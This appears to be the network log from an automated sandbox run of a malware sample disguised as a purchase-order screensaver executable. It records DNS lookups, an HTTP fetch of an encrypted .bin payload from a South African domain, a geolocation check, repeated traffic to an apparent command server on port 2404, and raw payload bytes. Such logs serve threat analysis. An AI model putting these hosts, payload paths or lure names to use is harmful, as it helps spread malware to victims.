                                                                                                    Nov 27, 2024 16:50:43.976252079 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:43.977292061 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.977427959 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.978394985 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:43.979260921 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.979340076 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.979402065 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.016947031 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.017059088 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.017138958 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.017718077 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.017775059 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.017827034 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.018923044 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.019047022 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.019210100 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.020447016 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.020569086 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.020627022 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.021981001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.022140026 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.022313118 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.023596048 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.023679018 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.024497986 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.025082111 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.025202990 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.025521994 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.026551962 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.026762009 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.026856899 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.028110981 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.028266907 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.028373003 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.029577017 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.029711008 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.029819012 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.031040907 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.031095982 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.031177998 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.032535076 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.032829046 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.032901049 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.033977032 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.034179926 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.034341097 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.035429001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070054054 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070105076 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070208073 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.070380926 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070431948 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.070588112 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070657015 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.070705891 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.071576118 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.071626902 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.071685076 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.072525024 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.072624922 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.072688103 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.073431015 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.073532104 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.073595047 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.074385881 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.074454069 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.074549913 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.075381994 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.075531960 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.075890064 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.076283932 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.076399088 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.076462984 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.077239990 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.077343941 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.077408075 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.078202009 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.078286886 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.078344107 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.079107046 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.079268932 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.079333067 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.080127001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.080224037 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081028938 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081094027 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.081132889 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081192017 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.082034111 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.082140923 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.082364082 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.082964897 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.083164930 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.083261967 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.083911896 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.084086895 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.084177971 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.084853888 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112564087 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112591982 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112731934 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.112940073 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112996101 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.113037109 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.113939047 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.114078045 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.114131927 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.114928007 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.115272045 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.122832060 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.122992039 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123065948 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.123332977 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123506069 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123559952 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.124255896 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.124351025 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.124413967 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.125166893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.125296116 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.125351906 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.126104116 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.126230001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.126316071 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.127073050 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.127235889 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.127321005 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.128087997 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.128200054 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.128436089 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:53:19.141123056 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:53:19.265388012 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:49.145493984 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:49.146939993 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:53:49.268090010 CET24044977694.156.227.184192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 16:50:27.330326080 CET | 50274 | 53 | 192.168.2.6 | 1.1.1.1
Nov 27, 2024 16:50:28.331729889 CET | 50274 | 53 | 192.168.2.6 | 1.1.1.1
Nov 27, 2024 16:50:28.454212904 CET | 53 | 50274 | 1.1.1.1 | 192.168.2.6
Nov 27, 2024 16:50:28.472810984 CET | 53 | 50274 | 1.1.1.1 | 192.168.2.6
Nov 27, 2024 16:50:37.304496050 CET | 51267 | 53 | 192.168.2.6 | 1.1.1.1
Nov 27, 2024 16:50:37.716075897 CET | 53 | 51267 | 1.1.1.1 | 192.168.2.6
Nov 27, 2024 16:50:40.357188940 CET | 63305 | 53 | 192.168.2.6 | 1.1.1.1
Nov 27, 2024 16:50:40.580705881 CET | 53 | 63305 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 16:50:27.330326080 CET | 192.168.2.6 | 1.1.1.1 | 0xb4f2 | Standard query (0) | www.healthselflesssupplies.co.za | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:28.331729889 CET | 192.168.2.6 | 1.1.1.1 | 0xb4f2 | Standard query (0) | www.healthselflesssupplies.co.za | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:37.304496050 CET | 192.168.2.6 | 1.1.1.1 | 0xd48f | Standard query (0) | mynewpro.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:40.357188940 CET | 192.168.2.6 | 1.1.1.1 | 0x5e1c | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 16:50:28.454212904 CET | 1.1.1.1 | 192.168.2.6 | 0xb4f2 | No error (0) | www.healthselflesssupplies.co.za | healthselflesssupplies.co.za | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 16:50:28.454212904 CET | 1.1.1.1 | 192.168.2.6 | 0xb4f2 | No error (0) | healthselflesssupplies.co.za | | 164.160.91.32 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:28.472810984 CET | 1.1.1.1 | 192.168.2.6 | 0xb4f2 | No error (0) | www.healthselflesssupplies.co.za | healthselflesssupplies.co.za | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 16:50:28.472810984 CET | 1.1.1.1 | 192.168.2.6 | 0xb4f2 | No error (0) | healthselflesssupplies.co.za | | 164.160.91.32 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:37.716075897 CET | 1.1.1.1 | 192.168.2.6 | 0xd48f | No error (0) | mynewpro.online | | 94.156.227.184 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:50:40.580705881 CET | 1.1.1.1 | 192.168.2.6 | 0x5e1c | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                    • www.healthselflesssupplies.co.za
                                                                                                    • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49782 | 178.237.33.50 | 80 | 4892 | C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:50:40.710700035 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 27, 2024 16:50:42.160033941 CET | 1170 | IN | HTTP/1.1 200 OK
date: Wed, 27 Nov 2024 15:50:41 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49755 | 164.160.91.32 | 443 | 4892 | C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-27 15:50:30 UTC | 205 | OUT | GET /LcyXvOliFVQGOWvhGBwKi128.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: www.healthselflesssupplies.co.za
Cache-Control: no-cache
2024-11-27 15:50:31 UTC | 404 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/octet-stream
last-modified: Wed, 27 Nov 2024 07:08:13 GMT
accept-ranges: bytes
content-length: 493120
date: Wed, 27 Nov 2024 15:50:31 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-27 15:50:31 UTC | 964 | IN | Data Raw: de 55 ad 08 ca 12 20 f7 ae dd 79 5e 17 70 46 21 89 c2 b6 1c b4 63 ca 22 a9 90 e2 92 43 d8 1d b6 7d b4 72 5d 5d 6d 9d 7b 92 6f 0f ee 86 c5 4d 65 b7 52 07 13 53 52 36 19 8e 93 ac 5c 7c 6f 06 f6 22 ff fc db cf dd 6f 0d 4c c0 34 22 1f 1f b4 cd d8 3a 83 65 32 2d 61 0d fc ec d1 ea 22 61 a7 0e 89 50 5d 52 22 77 4c 8f c1 8c 6d 43 77 8d 71 85 7c 84 bd 8b e5 a1 f1 21 26 a3 93 38 ed 0f 65 63 f0 ab 7e e0 1a 17 84 05 6b 46 f8 85 23 43 08 5b 67 85 19 48 10 4d e8 e2 3f 28 96 3f 54 86 5d 50 7f df 88 fc d5 14 01 fe d4 79 07 64 ed e7 0b f2 c3 51 c3 16 d8 1e 91 20 25 61 d6 e3 ed f9 82 34 ae 29 ef 0e 83 e5 c5 4f 25 91 8a 8b d1 42 e7 74 55 e8 b5 b1 c5 fa 31 4d ae aa b5 3e 7d a4 27 10 5c 5c 14 a5 89 8e 85 3e 57 b5 a3 76 2a 59 fd 88 bf c8 4b e8 c8 0e 6a b8 b0 26 9c e2 6c 36 34
Data Ascii: U y^pF!c"C}r]]m{oMeRSR6\|o"oL4":e2-a"aP]R"wLmCwq|!&8ec~kF#C[gHM?(?T]PydQ %a4)O%BtU1M>}'\\>Wv*YKj&l64
2024-11-27 15:50:31 UTC | 14994 | IN | Data Raw: 98 9d cf 1c 74 69 4c 2c 02 e2 6a b6 44 ba 93 89 51 f1 52 2f 43 b8 aa 08 72 be 3f c0 6d 50 57 55 20 61 51 92 fe f3 5a 8e 25 0d 33 3a 7a 94 d2 9a 54 f9 b3 00 c3 3c 5d d5 72 d2 81 2d bf b1 cf 20 7f b5 c7 6d 56 ed c8 09 42 d3 a7 53 72 c9 b1 16 05 91 ed 44 90 c9 c0 b0 5d bc 45 85 74 6d ec b4 e7 0c c9 be 5e 57 02 65 55 28 b8 eb 76 d3 2d 35 99 f6 b8 75 54 ee 6c 40 5f 24 6d 31 fb 10 23 fd 79 6d 6e 47 b8 db 86 d3 52 06 5d 4d bd fb 8d 53 5d 87 a2 2c c8 28 90 1d 1f 68 04 8b 18 92 7c 58 2d 4b 28 09 5a d8 01 58 79 77 18 10 ec 97 55 8b 54 ec ba 7f 27 fa 2f 4d 59 ba 04 ad 6b de ad 2e 1e 44 7a 73 d2 4f c2 df 91 92 95 66 6f 11 b9 c6 5e 6d eb d4 9e 4e 6a e1 fd 23 48 48 24 d7 dc eb 77 12 9d 3b 77 29 ec e2 52 0f bd cc ef 1e ba 33 e8 07 49 fa ed 72 54 96 6f be ac 89 27 02 ce
Data Ascii: tiL,jDQR/Cr?mPWU aQZ%3:zT<]r- mVBSrD]Etm^WeU(v-5uTl@_$m1#ymnGR]MS],(h|X-K(ZXywUT'/MYk.DzsOfo^mNj#HH$w;w)R3IrTo'
2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: 08 d3 87 3f 9a c5 d1 56 16 0c bf d2 55 97 e7 b2 20 01 fd 31 20 24 82 d0 57 1d a6 09 ee 10 e8 90 a8 6a 08 85 cc 1f 95 c0 23 28 9a 09 32 fd ea 91 da a7 fd 71 74 0c 2a e4 53 5e 04 b4 84 d5 30 0c 3e e6 22 2e 58 3a 09 6c 8b 97 0f d6 9e 55 9f 4a a0 0f a1 62 b8 7e c7 b4 33 bb ad ad 94 84 1f 05 b5 1b 9a 5b 81 00 c4 88 b5 32 59 8c 52 2e 0c 54 ae 14 e7 d1 ba 70 a8 d3 b5 f0 8d f8 58 21 17 70 35 83 84 78 8f 0b 4e 47 ba 7d 45 0e 15 5a 7e 38 80 42 0f 50 fe 23 71 56 f7 00 6f 03 24 7a 0a 8a ee 65 72 0c d5 11 62 62 f5 9c 4f b8 4d 75 f0 dd 0b 30 69 31 c9 1f da 45 86 f0 50 64 78 d7 cf 74 24 48 d8 9b 6f 93 1c 20 9b 15 3b 69 21 0d 27 85 92 94 85 bd f8 5c bd 1a 3f 54 41 22 c0 2b 95 ea d3 5b bd 74 50 6c af 75 79 02 1b a6 68 cc 9d fa 2f 05 73 bc 4a 70 71 22 4b 45 88 c7 aa 2a 4b
Data Ascii: ?VU 1 $Wj#(2qt*S^0>".X:lUJb~3[2YR.TpX!p5xNG}EZ~8BP#qVo$zerbbOMu0i1EPdxt$Ho ;i!'\?TA"+[tPluyh/sJpq"KE*K
2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: 12 bc 40 e8 b8 ac 28 93 59 75 a5 96 29 06 08 1c 35 8f ed 97 1b da e0 57 6d 6b 95 74 36 bc 38 43 c5 8d d3 f0 da 6a 62 9d 4a 32 0c 87 49 ee ce dc 86 0f 13 06 12 6e c8 1a ea b1 51 3e 02 f3 e2 e8 4c 33 60 da 6f 0d b7 f7 cb 14 1f d0 39 80 a4 d2 23 6d 32 2d e2 c9 b0 61 54 16 de 9e 58 5e e1 d0 07 14 22 fa 19 87 4c c1 f9 ab 90 77 8e 7a 25 0f 75 63 9e 32 0e de 76 5c 86 9c 97 4b 65 e8 06 3d b9 06 97 ee 19 20 39 6d 06 36 6d 9d a3 46 3d 75 d5 20 e9 ee e7 c4 0b 03 b6 b4 87 7c cc c0 61 9a 61 52 1d cd cd 6f 0b 9b a2 ac 8e 15 a7 2d 69 7b 7b 71 f6 13 9c 42 09 be 90 e3 60 bc 5e dd 9a 02 58 aa b6 28 e0 44 62 26 03 2b 96 1f a2 f1 1c 3c 18 86 61 36 1f bb a2 7e 14 bc 8a 6c c0 e7 24 9b 68 ad 3a 56 2e 8c e6 0e 35 69 74 ad db 80 70 65 57 1f 72 b0 36 b3 a6 f9 bf 04 e5 fa 56 1d 33
Data Ascii: @(Yu)5Wmkt68CjbJ2InQ>L3`o9#m2-aTX^"Lwz%uc2v\Ke= 9m6mF=u |aaRo-i{{qB`^X(Db&+<a6~l$h:V.5itpeWr6V3
2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: 5d 81 cf a1 ce b6 b8 e7 dd c4 1b 62 c7 df 2d 36 19 d5 a8 0c 17 35 b0 7f 99 20 05 92 3e 62 e3 a7 a7 07 40 14 61 ae 60 51 17 d2 2c d5 83 f1 92 5e 23 b8 d1 e1 00 9e fc f3 d0 e2 f3 74 85 ad d0 58 f9 43 47 e3 7d 76 12 25 8d e1 2d a8 be fe 61 14 34 52 a8 8e 6c 17 30 dc 4f 8b 13 c5 40 0a c4 37 b5 da f5 5d 6c 06 4b f1 da c8 ad 50 19 b3 6f 11 df 6c c1 d2 a0 e2 8c 5f d8 9a b3 5c 1e 1d 3f 67 fc 73 e8 18 f7 ae 8e aa 46 c8 ea ac 77 ec d1 84 93 f0 b9 65 4d 85 51 66 75 4c 99 d6 ff eb 6e 31 e5 66 dc 9a 2f c1 9a 2e 99 8a c0 5a fa 5d fc 3f 21 e3 bd c8 02 23 32 35 1b 62 da 2b 6b 46 ab e6 01 64 7b e5 0f 99 6c c0 dd 53 f8 82 1a 47 6f 4e 24 82 78 d6 98 3e ba ef ed de 89 7d 28 de 98 01 aa 05 d6 4a df 4f 09 41 ed 2b 9b f1 ac b8 08 06 06 83 ba 44 8f a3 c9 0f 28 27 aa db 59 0c 83
Data Ascii: ]b-65 >b@a`Q,^#tXCG}v%-a4Rl0O@7]lKPol_\?gsFweMQfuLn1f/.Z]?!#25b+kFd{lSGoN$x>}(JOA+D('Y
2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: 46 b3 a2 3b 34 c1 c1 22 11 45 0d d5 6d c9 ca 57 8d 92 4c d4 ed c5 c2 70 1b 67 f6 21 8a dd cf 20 8b 30 57 fd bd 8e a6 ab e7 65 f8 b5 02 39 fd 27 e7 a7 12 52 44 99 51 89 56 74 eb 98 0f 3c 78 20 55 e9 91 0b 6e 7b 28 48 54 e5 73 40 68 a8 0e 0c 2e d4 96 66 61 b9 a6 01 ed 87 f7 60 7a 9d 26 90 01 40 b4 9b 58 1d c6 8d cc d7 12 b4 a9 99 fd 7a 71 23 36 a3 23 22 bc 29 18 b1 6a f2 6e 81 27 91 c7 f1 a0 f5 d2 a7 3a 55 2d 38 45 35 19 98 14 e8 9b 34 00 f1 c7 39 57 d6 30 4f bf 68 7f 87 05 98 80 f7 fc 17 43 78 be 90 62 2d 2a f3 31 66 39 cc 8c 55 4f 76 b6 89 f9 3c 09 55 38 74 b3 54 56 dc fd 22 85 bb fe 7e f6 7f fe 4c db 45 7b e9 b1 ec 07 5a 67 3d 9e ef 89 06 98 3f 13 1a 96 be 4b 94 47 6e db cf 4a f2 b0 0b 38 a3 19 16 db c7 be 02 6c 72 b2 7a 34 8f 97 81 4a 62 a3 74 2c d5 72
Data Ascii: F;4"EmWLpg! 0We9'RDQVt<x Un{(HTs@h.fa`z&@Xzq#6#")jn':U-8E549W0OhCxb-*1f9UOv<U8tTV"~LE{Zg=?KGnJ8lrz4Jbt,r
